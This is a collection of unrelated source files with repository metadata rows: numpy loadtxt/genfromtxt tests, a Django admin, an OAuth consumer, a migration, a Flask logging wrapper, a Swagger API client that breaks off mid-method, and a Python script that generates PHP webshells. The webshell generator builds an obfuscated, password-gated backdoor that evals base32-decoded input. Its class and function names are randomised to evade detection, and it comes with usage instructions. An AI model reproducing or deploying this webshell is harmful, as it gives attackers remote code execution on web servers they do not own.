assert_equal(test, ctrl)
def test_autonames_and_usecols(self):
"Tests names and usecols"
data = StringIO.StringIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'),
names=True, dtype=None)
control = np.array(('aaaa', 45, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_with_usecols(self):
"Test the combination user-defined converters and usecol"
data = StringIO.StringIO('1,2,3,,5\n6,7,8,9,10\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',',
converters={3:lambda s: int(s or -999)},
usecols=(1, 3, ))
control = np.array([[2, -999], [7, 9]], int)
assert_equal(test, control)
def test_converters_with_usecols_and_names(self):
"Tests names and usecols"
data = StringIO.StringIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'), names=True,
dtype=None, converters={'C':lambda s: 2 * int(s)})
control = np.array(('aaaa', 90, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_cornercases(self):
"Test the conversion to datetime."
converter = {'date': lambda s: strptime(s, '%Y-%m-%d %H:%M:%SZ')}
data = StringIO.StringIO('2009-02-03 12:00:00Z, 72214.0')
test = np.ndfromtxt(data, delimiter=',', dtype=None,
names=['date','stid'], converters=converter)
control = np.array((datetime(2009,02,03), 72214.),
dtype=[('date', np.object_), ('stid', float)])
assert_equal(test, control)
def test_unused_converter(self):
"Test whether unused converters are forgotten"
data = StringIO.StringIO("1 21\n 3 42\n")
test = np.ndfromtxt(data, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_equal(test, [21, 42])
#
data.seek(0)
test = np.ndfromtxt(data, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_equal(test, [33, 66])
def test_dtype_with_converters(self):
dstr = "2009; 23; 46"
test = np.ndfromtxt(StringIO.StringIO(dstr,),
delimiter=";", dtype=float, converters={0:str})
control = np.array([('2009', 23., 46)],
dtype=[('f0','|S4'), ('f1', float), ('f2', float)])
assert_equal(test, control)
test = np.ndfromtxt(StringIO.StringIO(dstr,),
delimiter=";", dtype=float, converters={0:float})
control = np.array([2009., 23., 46],)
assert_equal(test, control)
def test_dtype_with_object(self):
"Test using an explicit dtype with an object"
from datetime import date
import time
data = """
1; 2001-01-01
2; 2002-01-31
"""
ndtype = [('idx', int), ('code', np.object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.genfromtxt(StringIO.StringIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array([(1, datetime(2001,1,1)), (2, datetime(2002,1,31))],
dtype=ndtype)
assert_equal(test, control)
#
ndtype = [('nest', [('idx', int), ('code', np.object)])]
try:
test = np.genfromtxt(StringIO.StringIO(data), delimiter=";",
dtype=ndtype, converters=converters)
except NotImplementedError:
pass
else:
errmsg = "Nested dtype involving objects should be supported."
raise AssertionError(errmsg)
def test_userconverters_with_explicit_dtype(self):
"Test user_converters w/ explicit (standard) dtype"
data = StringIO.StringIO('skip,skip,2001-01-01,1.0,skip')
test = np.genfromtxt(data, delimiter=",", names=None, dtype=float,
usecols=(2, 3), converters={2: str})
control = np.array([('2001-01-01', 1.)],
dtype=[('', '|S10'), ('', float)])
assert_equal(test, control)
def test_spacedelimiter(self):
"Test space delimiter"
data = StringIO.StringIO("1 2 3 4 5\n6 7 8 9 10")
test = np.ndfromtxt(data)
control = np.array([[ 1., 2., 3., 4., 5.],
[ 6., 7., 8., 9.,10.]])
assert_equal(test, control)
def test_missing(self):
data = StringIO.StringIO('1,2,3,,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or -999)})
control = np.array([1, 2, 3, -999, 5], int)
assert_equal(test, control)
def test_usecols(self):
"Test the selection of columns"
# Select 1 column
control = np.array( [[1, 2], [3, 4]], float)
data = StringIO.StringIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1,))
assert_equal(test, control[:, 1])
#
control = np.array( [[1, 2, 3], [3, 4, 5]], float)
data = StringIO.StringIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1, 2))
assert_equal(test, control[:, 1:])
# Testing with arrays instead of tuples.
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=np.array([1, 2]))
assert_equal(test, control[:, 1:])
        # Checking with dtype-defined converters.
data = StringIO.StringIO("""JOE 70.1 25.3\nBOB 60.5 27.9""")
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
test = np.ndfromtxt(data, usecols=(0, 2), dtype=zip(names, dtypes))
assert_equal(test['stid'], ["JOE", "BOB"])
assert_equal(test['temp'], [25.3, 27.9])
def test_empty_file(self):
"Test that an empty file raises the proper exception"
data = StringIO.StringIO()
assert_raises(IOError, np.ndfromtxt, data)
def test_fancy_dtype_alt(self):
"Check that a nested dtype isn't MIA"
data = StringIO.StringIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.mafromtxt(data, dtype=fancydtype, delimiter=',')
control = ma.array([(1,(2,3.0)),(4,(5,6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_withmissing(self):
data = StringIO.StringIO('A,B\n0,1\n2,N/A')
test = np.mafromtxt(data, dtype=None, delimiter=',', missing='N/A',
names=True)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
#
data.seek(0)
test = np.mafromtxt(data, delimiter=',', missing='N/A', names=True)
control = ma.array([(0, 1), (2, -1)],
mask=[[False, False], [False, True]],)
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_user_missing_values(self):
datastr ="A, B, C\n0, 0., 0j\n1, N/A, 1j\n-9, 2.2, N/A\n3, -99, 3j"
data = StringIO.StringIO(datastr)
basekwargs = dict(dtype=None, delimiter=',', names=True, missing='N/A')
mdtype = [('A', int), ('B', float), ('C', complex)]
#
test = np.mafromtxt(data, **basekwargs)
control = ma.array([( 0, 0.0, 0j), (1, -999, 1j),
( -9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (0, 0, 1), (0, 0, 0)],
dtype=mdtype)
assert_equal(test, control)
#
data.seek(0)
test = np.mafromtxt(data,
missing_values={0:-9, 1:-99, 2:-999j}, **basekwargs)
control = ma.array([( 0, 0.0, 0j), (1, -999, 1j),
( -9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
#
data.seek(0)
test = np.mafromtxt(data,
missing_values={0:-9, 'B':-99, 'C':-999j},
**basekwargs)
control = ma.array([( 0, 0.0, 0j), (1, -999, 1j),
( -9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
def test_withmissing_float(self):
data = StringIO.StringIO('A,B\n0,1.5\n2,-999.00')
test = np.mafromtxt(data, dtype=None, delimiter=',', missing='-999.0',
names=True,)
control = ma.array([(0, 1.5), (2, -1.)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_with_masked_column_uniform(self):
"Test masked column"
data = StringIO.StringIO('1 2 3\n4 5 6\n')
test = np.genfromtxt(data, missing='2,5', dtype=None, usemask=True)
control = ma.array([[1, 2, 3], [4, 5, 6]], mask=[[0, 1, 0],[0, 1, 0]])
assert_equal(test, control)
def test_with_masked_column_various(self):
"Test masked column"
data = StringIO.StringIO('True 2 3\nFalse 5 6\n')
test = np.genfromtxt(data, missing='2,5', dtype=None, usemask=True)
control = ma.array([(1, 2, 3), (0, 5, 6)],
mask=[(0, 1, 0),(0, 1, 0)],
dtype=[('f0', bool), ('f1', bool), ('f2', int)])
assert_equal(test, control)
def test_recfromtxt(self):
#
data = StringIO.StringIO('A,B\n0,1\n2,3')
test = np.recfromtxt(data, delimiter=',', missing='N/A', names=True)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.failUnless(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = StringIO.StringIO('A,B\n0,1\n2,N/A')
test = np.recfromtxt(data, dtype=None, delimiter=',', missing='N/A',
names=True, usemask=True)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
def test_recfromcsv(self):
#
data = StringIO.StringIO('A,B\n0,1\n2,3')
test = np.recfromcsv(data, missing='N/A',
names=True, case_sensitive=True)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.failUnless(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = StringIO.StringIO('A,B\n0,1\n2,N/A')
test = np.recfromcsv(data, dtype=None, missing='N/A',
names=True, case_sensitive=True, usemask=True)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
#
data = StringIO.StringIO('A,B\n0,1\n2,3')
test = np.recfromcsv(data, missing='N/A',)
control = np.array([(0, 1), (2, 3)],
dtype=[('a', np.int), ('b', np.int)])
self.failUnless(isinstance(test, np.recarray))
assert_equal(test, control)
def test_gzip_load():
a = np.random.random((5, 5))
s = StringIO.StringIO()
f = gzip.GzipFile(fileobj=s, mode="w")
np.save(f, a)
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.load(f), a)
def test_gzip_loadtxt():
    # Thanks to another Windows brokenness, we can't use
# NamedTemporaryFile: a file created from this function cannot be
# reopened by another open call. So we first put the gzipped string
# of the test reference array, write it to a securely opened file,
# which is then read from by the loadtxt function
s = StringIO.StringIO()
g = gzip.GzipFile(fileobj=s, mode='w')
g.write('1 2 3\n')
g.close()
s.seek(0)
f, name = mkstemp(suffix='.gz')
try:
os.write(f, s.read())
s.close()
assert_array_equal(np.loadtxt(name), [1, 2, 3])
finally:
os.close(f)
os.unlink(name)
def test_gzip_loadtxt_from_string():
s = StringIO.StringIO()
f = gzip.GzipFile(fileobj=s, mode="w")
f.write('1 2 3\n')
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.loadtxt(f), [1, 2, 3])
if __name__ == "__main__":
run_module_suite()
| bsd-3-clause | 7,035,468,945,602,116,000 | 35.440936 | 86 | 0.505472 | false | 3.270733 | true | false | false |
SmartElect/SmartElect | staff/admin.py | 1 | 1127 | from django.contrib.auth.models import User, Group, Permission
from django.contrib.auth.admin import UserAdmin, GroupAdmin
from libya_elections.admin_site import admin_site
class LibyaUserAdmin(UserAdmin):
list_display = ('username', 'email', 'first_name', 'last_name', 'is_active', 'is_staff',
'is_superuser')
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('username', 'password1', 'password2', 'email')
}),
)
def get_actions(self, request):
""""Don't allow bulk deletion."""
return {}
def get_form(self, request, obj=None, **kwargs):
"""Make email a required field."""
form = super(LibyaUserAdmin, self).get_form(request, obj, **kwargs)
email = form.base_fields['email']
email.required = True
return form
def has_delete_permission(self, request, obj=None):
"""Don't allow deletion of users. (Inactivate them instead)."""
return False
admin_site.register(User, LibyaUserAdmin)
admin_site.register(Group, GroupAdmin)
admin_site.register(Permission)
| apache-2.0 | -4,079,308,572,742,323,700 | 30.305556 | 92 | 0.62378 | false | 3.794613 | false | false | false |
CLLKazan/iCQA | qa-engine/forum_modules/oauthauth/consumer.py | 1 | 3718 | import urllib
import urllib2
import httplib
import time
from forum.authentication.base import AuthenticationConsumer, InvalidAuthentication
from django.utils.translation import ugettext as _
from lib import oauth
class OAuthAbstractAuthConsumer(AuthenticationConsumer):
def __init__(self, consumer_key, consumer_secret, server_url, request_token_url, access_token_url, authorization_url):
self.consumer_secret = consumer_secret
self.consumer_key = consumer_key
self.consumer = oauth.OAuthConsumer(consumer_key, consumer_secret)
self.signature_method = oauth.OAuthSignatureMethod_HMAC_SHA1()
self.server_url = server_url
self.request_token_url = request_token_url
self.access_token_url = access_token_url
self.authorization_url = authorization_url
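    # Overall flow implemented below (summary; see each method):
    #   1. prepare_authentication_request() fetches an unauthed request token,
    #      stores it in the session and returns the provider's authorize URL.
    #   2. process_authentication_request() verifies the returned oauth_token
    #      and exchanges it for an access token string.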
def prepare_authentication_request(self, request, redirect_to):
request_token = self.fetch_request_token()
request.session['unauthed_token'] = request_token.to_string()
return self.authorize_token_url(request_token)
def process_authentication_request(self, request):
unauthed_token = request.session.get('unauthed_token', None)
if not unauthed_token:
raise InvalidAuthentication(_('Error, the oauth token is not on the server'))
token = oauth.OAuthToken.from_string(unauthed_token)
if token.key != request.GET.get('oauth_token', 'no-token'):
raise InvalidAuthentication(_("Something went wrong! Auth tokens do not match"))
access_token = self.fetch_access_token(token)
return access_token.to_string()
def get_user_data(self, key):
#token = oauth.OAuthToken.from_string(access_token)
return {}
def fetch_request_token(self):
oauth_request = oauth.OAuthRequest.from_consumer_and_token(self.consumer, http_url=self.request_token_url)
oauth_request.sign_request(self.signature_method, self.consumer, None)
params = oauth_request.parameters
data = urllib.urlencode(params)
full_url='%s?%s'%(self.request_token_url, data)
response = urllib2.urlopen(full_url)
return oauth.OAuthToken.from_string(response.read())
def authorize_token_url(self, token, callback_url=None):
oauth_request = oauth.OAuthRequest.from_token_and_callback(token=token,\
callback=callback_url, http_url=self.authorization_url)
params = oauth_request.parameters
data = urllib.urlencode(params)
full_url='%s?%s'%(self.authorization_url, data)
return full_url
def fetch_access_token(self, token):
oauth_request = oauth.OAuthRequest.from_consumer_and_token(self.consumer, token=token, http_url=self.access_token_url)
oauth_request.sign_request(self.signature_method, self.consumer, token)
params = oauth_request.parameters
data = urllib.urlencode(params)
full_url='%s?%s'%(self.access_token_url, data)
response = urllib2.urlopen(full_url)
return oauth.OAuthToken.from_string(response.read())
def fetch_data(self, token, http_url, parameters=None):
access_token = oauth.OAuthToken.from_string(token)
oauth_request = oauth.OAuthRequest.from_consumer_and_token(
self.consumer, token=access_token, http_method="GET",
http_url=http_url, parameters=parameters,
)
oauth_request.sign_request(self.signature_method, self.consumer, access_token)
url = oauth_request.to_url()
connection = httplib.HTTPSConnection(self.server_url)
connection.request(oauth_request.http_method, url)
return connection.getresponse().read()
| gpl-3.0 | -633,388,579,268,110,200 | 41.735632 | 126 | 0.686391 | false | 3.963753 | false | false | false |
mferenca/HMS-ecommerce | ecommerce/invoice/migrations/0001_initial.py | 1 | 2891 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import django_extensions.db.fields
import django.utils.timezone
import django.db.models.deletion
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('basket', '0006_basket_site'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='HistoricalInvoice',
fields=[
('id', models.IntegerField(verbose_name='ID', db_index=True, auto_created=True, blank=True)),
('created', django_extensions.db.fields.CreationDateTimeField(default=django.utils.timezone.now, verbose_name='created', editable=False, blank=True)),
('modified', django_extensions.db.fields.ModificationDateTimeField(default=django.utils.timezone.now, verbose_name='modified', editable=False, blank=True)),
('state', models.CharField(default=b'Not Paid', max_length=255, choices=[(b'Not Paid', 'Not Paid'), (b'Paid', 'Paid')])),
('history_id', models.AutoField(serialize=False, primary_key=True)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(max_length=1, choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')])),
('basket', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='basket.Basket', null=True)),
('history_user', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
'verbose_name': 'historical invoice',
},
),
migrations.CreateModel(
name='Invoice',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('created', django_extensions.db.fields.CreationDateTimeField(default=django.utils.timezone.now, verbose_name='created', editable=False, blank=True)),
('modified', django_extensions.db.fields.ModificationDateTimeField(default=django.utils.timezone.now, verbose_name='modified', editable=False, blank=True)),
('state', models.CharField(default=b'Not Paid', max_length=255, choices=[(b'Not Paid', 'Not Paid'), (b'Paid', 'Paid')])),
('basket', models.ForeignKey(to='basket.Basket')),
],
options={
'ordering': ('-modified', '-created'),
'abstract': False,
'get_latest_by': 'modified',
},
),
]
| agpl-3.0 | 945,000,647,318,833,700 | 53.54717 | 176 | 0.603597 | false | 4.118234 | false | false | false |
bayazee/flacon | flacon/utils/extended_logging.py | 1 | 6366 | import sys
from flask import _request_ctx_stack
def wrap_app_logger(app):
"""
    Attach a LoggerWrapper to the given application and configure its logging handler.
:param app: Application Object
:type app: Object
"""
app.debug_log_format = app.config['LOG_FORMAT']
app._logger = None
app._logger = LoggerWrapper(app.logger, app.logger_name)
if not app.debug:
from logging import StreamHandler, DEBUG, Formatter
handler = StreamHandler()
handler.setLevel(app.config.get('LOG_LEVEL', DEBUG))
handler.setFormatter(Formatter(app.config.get('LOG_FORMAT', app.debug_log_format)))
app._logger.addHandler(handler)
app.logger.info('Starting project')
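# Illustrative usage (a sketch; assumes a Flask app whose config provides
# LOG_FORMAT and, optionally, LOG_LEVEL):
#     app = Flask(__name__)
#     wrap_app_logger(app)
#     app._logger.info('something happened')   # record carries request context
#     app._logger.create_logger('audit')       # adds app._logger.audit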
class LoggerWrapper(object):
"""
    Wraps the application logger so that every record carries request context.

    :param logger: Logger instance object
    :type logger: Object
    :param logger_name: Name under which this logger is registered
    :type logger_name: String
"""
def __init__(self, logger, logger_name):
self.logger_name = logger_name
self.logger = logger
self.extra_handlers = []
def process(self, msg, args, kwargs):
"""
        Build the final log message and inject request context (path, URL,
        method, remote address, user agent) into ``kwargs['extra']``.

        :param msg: body of message
        :type msg: String
        :param args: list of positional parameters
        :type args: List
        :param kwargs: dict of keyword arguments
        :type kwargs: Dict
        :returns: tuple of (msg, args, kwargs)
        :rtype: tuple
"""
path = method = remote_addr = user_agent = url = u''
ctx = _request_ctx_stack.top
if ctx is not None:
path = ctx.request.path
url = ctx.request.url
method = ctx.request.method
remote_addr = ctx.request.remote_addr
user_agent = ctx.request.headers.get('user-agent', u'')
kwargs['extra'] = dict(
logger_name=self.logger_name,
http_path=path,
http_url=url,
http_method=method,
http_remote_addr=remote_addr,
http_user_agent=user_agent
)
for handler in self.extra_handlers:
kwargs['extra'].update(handler(ctx))
if args:
# if isinstance(args[0], dict):
msg = msg + ' ' + repr(args[0])
return msg, [], kwargs
def create_logger(self, name):
"""
        Create a child LoggerWrapper and attach it to this wrapper under the given name.

        :param name: Name of the child logger to create
:type name: String
"""
assert not hasattr(self, name)
setattr(self, name, LoggerWrapper(self.logger, name))
def debug(self, msg, *args, **kwargs):
"""
        Log a message with DEBUG level, enriched with request context.

        :param msg: body of message
        :type msg: String
        :param args: list of positional parameters
        :type args: List
        :param kwargs: dict of keyword arguments
:type kwargs: Dict
"""
msg, args, kwargs = self.process(msg, args, kwargs)
self.logger.debug(msg, *args, **kwargs)
def info(self, msg, *args, **kwargs):
"""
        Log a message with INFO level, enriched with request context.

        :param msg: body of message
        :type msg: String
        :param args: list of positional parameters
        :type args: List
        :param kwargs: dict of keyword arguments
:type kwargs: Dict
"""
msg, args, kwargs = self.process(msg, args, kwargs)
self.logger.info(msg, *args, **kwargs)
def warning(self, msg, *args, **kwargs):
"""
        Log a message with WARNING level.
        :param msg: body of the message
        :type msg: String
        :param args: positional arguments
        :type args: List
        :param kwargs: keyword arguments
:type kwargs: Dict
"""
msg, args, kwargs = self.process(msg, args, kwargs)
self.logger.warning(msg, *args, **kwargs)
def error(self, msg, *args, **kwargs):
"""
        Log a message with ERROR level.
        :param msg: body of the message
        :type msg: String
        :param args: positional arguments
        :type args: List
        :param kwargs: keyword arguments
:type kwargs: Dict
"""
msg, args, kwargs = self.process(msg, args, kwargs)
self.logger.error(msg, *args, **kwargs)
def exception(self, msg, *args, **kwargs):
"""
        Log a message with ERROR level and attach the current exception info.
        :param msg: body of the message
        :type msg: String
        :param args: positional arguments
        :type args: List
        :param kwargs: keyword arguments
:type kwargs: Dict
"""
msg, args, kwargs = self.process(msg, args, kwargs)
kwargs['exc_info'] = sys.exc_info()
self.logger.error(msg, *args, **kwargs)
def critical(self, msg, *args, **kwargs):
"""
        Log a message with CRITICAL level.
        :param msg: body of the message
        :type msg: String
        :param args: positional arguments
        :type args: List
        :param kwargs: keyword arguments
:type kwargs: Dict
"""
msg, args, kwargs = self.process(msg, args, kwargs)
self.logger.critical(msg, *args, **kwargs)
def log(self, level, msg, *args, **kwargs):
"""
        Log a message with the given ``level``.
        :param level: logging level
        :type level: Integer
        :param msg: body of the message
        :type msg: String
        :param args: positional arguments
        :type args: List
        :param kwargs: keyword arguments
:type kwargs: Dict
"""
msg, args, kwargs = self.process(msg, args, kwargs)
self.logger.log(level, msg, *args, **kwargs)
def __getattr__(self, name):
return getattr(self.logger, name)
    def inject(self, f):
"""
:example:
.. code-block:: python
            @app.logger.inject
def log_user(ctx):
d = {}
d['app_user'] = 'anonymous'
if ctx is not None and ctx.g.user is not None:
d['app_user'] = ctx.g.user.mailbox
return d
"""
self.extra_handlers.append(f)
return f
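# Illustrative sketch (hypothetical names): after ``wrap_app_logger(app)`` has
# run, named sub-loggers can be created and used like regular loggers while
# still carrying the HTTP request context of the current request:
#
#   app._logger.create_logger('payments')
#   app._logger.payments.info('payment accepted', {'order_id': 42})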
| bsd-3-clause | -2,105,913,396,540,555,800 | 29.170616 | 104 | 0.570531 | false | 4.139142 | false | false | false |
tennc/webshell | php/create_webshell_with_py.py | 1 | 2291 | import random
#author: pureqh
#github: https://github.com/pureqh/webshell
#use:GET:http://url?pass=pureqh POST:zero
shell = '''<?php
class {0}{1}
public ${2} = null;
public ${3} = null;
function __construct(){1}
if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){1}
$this->{2} = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
$this->{3} = @{9}($this->{2});
@eval({5}.$this->{3}.{5});
{4}{4}{4}
new {0}();
function {6}(${7}){1}
$BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
${8} = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
$v <<= 8;
$v += ord(${7}[$i]);
$vbits += 8;
while ($vbits >= 5) {1}
$vbits -= 5;
${8} .= $BASE32_ALPHABET[$v >> $vbits];
$v &= ((1 << $vbits) - 1);{4}{4}
if ($vbits > 0){1}
$v <<= (5 - $vbits);
${8} .= $BASE32_ALPHABET[$v];{4}
return ${8};{4}
function {9}(${7}){1}
${8} = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
$v <<= 5;
if (${7}[$i] >= 'a' && ${7}[$i] <= 'z'){1}
$v += (ord(${7}[$i]) - 97);
{4} elseif (${7}[$i] >= '2' && ${7}[$i] <= '7') {1}
$v += (24 + ${7}[$i]);
{4} else {1}
exit(1);
{4}
$vbits += 5;
while ($vbits >= 8){1}
$vbits -= 8;
${8} .= chr($v >> $vbits);
$v &= ((1 << $vbits) - 1);{4}{4}
return ${8};{4}
?>'''
def random_keys(len):
str = '`~-=!@#$%^&_+?<>|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
def random_name(len):
str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
def build_webshell():
className = random_name(4)
lef = '''{'''
parameter1 = random_name(4)
parameter2 = random_name(4)
rig = '''}'''
disrupt = "\"/*"+random_keys(7)+"*/\""
fun1 = random_name(4)
fun1_vul = random_name(4)
fun1_ret = random_name(4)
fun2 = random_name(4)
shellc = shell.format(className,lef,parameter1,parameter2,rig,disrupt,fun1,fun1_vul,fun1_ret,fun2)
return shellc
if __name__ == '__main__':
print (build_webshell())
| gpl-3.0 | -521,559,099,805,396,200 | 27.283951 | 102 | 0.454387 | false | 2.568386 | false | false | false |
Mapotempo/mapotempo-qgis-plugin | SwaggerMapo/apis/plannings_api.py | 1 | 44443 | #!/usr/bin/env python
# coding: utf-8
"""
PlanningsApi.py
Copyright 2015 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually.
"""
from __future__ import absolute_import
import sys
import os
# python 2 and python 3 compatibility library
from six import iteritems
from .. import configuration
from ..api_client import ApiClient
class PlanningsApi(object):
def __init__(self, api_client=None):
if api_client:
self.api_client = api_client
else:
if not configuration.api_client:
configuration.api_client = ApiClient('http://beta.app.mapotempo.com/api')
self.api_client = configuration.api_client
def get_plannings(self, **kwargs):
"""
Fetch customer's plannings.
:return: list[V01Planning]
"""
all_params = []
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method get_plannings" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings.{format}'.replace('{format}', 'json')
method = 'GET'
path_params = {}
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='list[V01Planning]', auth_settings=auth_settings)
return response
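    # Illustrative usage sketch (not part of the generated client; the API key
    # and the attribute names on the returned objects are assumptions):
    #
    #   from SwaggerMapo import configuration
    #   from SwaggerMapo.apis.plannings_api import PlanningsApi
    #
    #   configuration.api_key['api_key'] = 'MY-API-KEY'
    #   api = PlanningsApi()
    #   for planning in api.get_plannings():
    #       print(planning.id, planning.name)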
def create_planning(self, name, **kwargs):
"""
Create planning.
:param str name: (required)
:param str ref:
:param str date:
:param int zoning_id:
:param bool out_of_date:
:param list[int] route_ids:
:param list[int] tag_ids:
:return: V01Planning
"""
# verify the required parameter 'name' is set
if name is None:
raise ValueError("Missing the required parameter `name` when calling `create_planning`")
all_params = ['name', 'ref', 'date', 'zoning_id', 'out_of_date', 'route_ids', 'tag_ids']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method create_planning" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings.{format}'.replace('{format}', 'json')
method = 'POST'
path_params = {}
query_params = {}
header_params = {}
form_params = {}
files = {}
if 'name' in params:
form_params['name'] = params['name']
if 'ref' in params:
form_params['ref'] = params['ref']
if 'date' in params:
form_params['date'] = params['date']
if 'zoning_id' in params:
form_params['zoning_id'] = params['zoning_id']
if 'out_of_date' in params:
form_params['out_of_date'] = params['out_of_date']
if 'route_ids' in params:
form_params['route_ids'] = params['route_ids']
if 'tag_ids' in params:
form_params['tag_ids'] = params['tag_ids']
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Planning', auth_settings=auth_settings)
return response
def delete_plannings(self, ids, **kwargs):
"""
Delete multiple plannings.
:param list[Integer] ids: (required)
:return: str
"""
# verify the required parameter 'ids' is set
if ids is None:
raise ValueError("Missing the required parameter `ids` when calling `delete_plannings`")
all_params = ['ids']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method delete_plannings" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings.{format}'.replace('{format}', 'json')
method = 'DELETE'
path_params = {}
query_params = {}
if 'ids' in params:
query_params['ids'] = params['ids']
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def get_planning(self, id, **kwargs):
"""
Fetch planning.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: V01Planning
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `get_planning`")
all_params = ['id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method get_planning" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}.{format}'.replace('{format}', 'json')
method = 'GET'
path_params = {}
if 'id' in params:
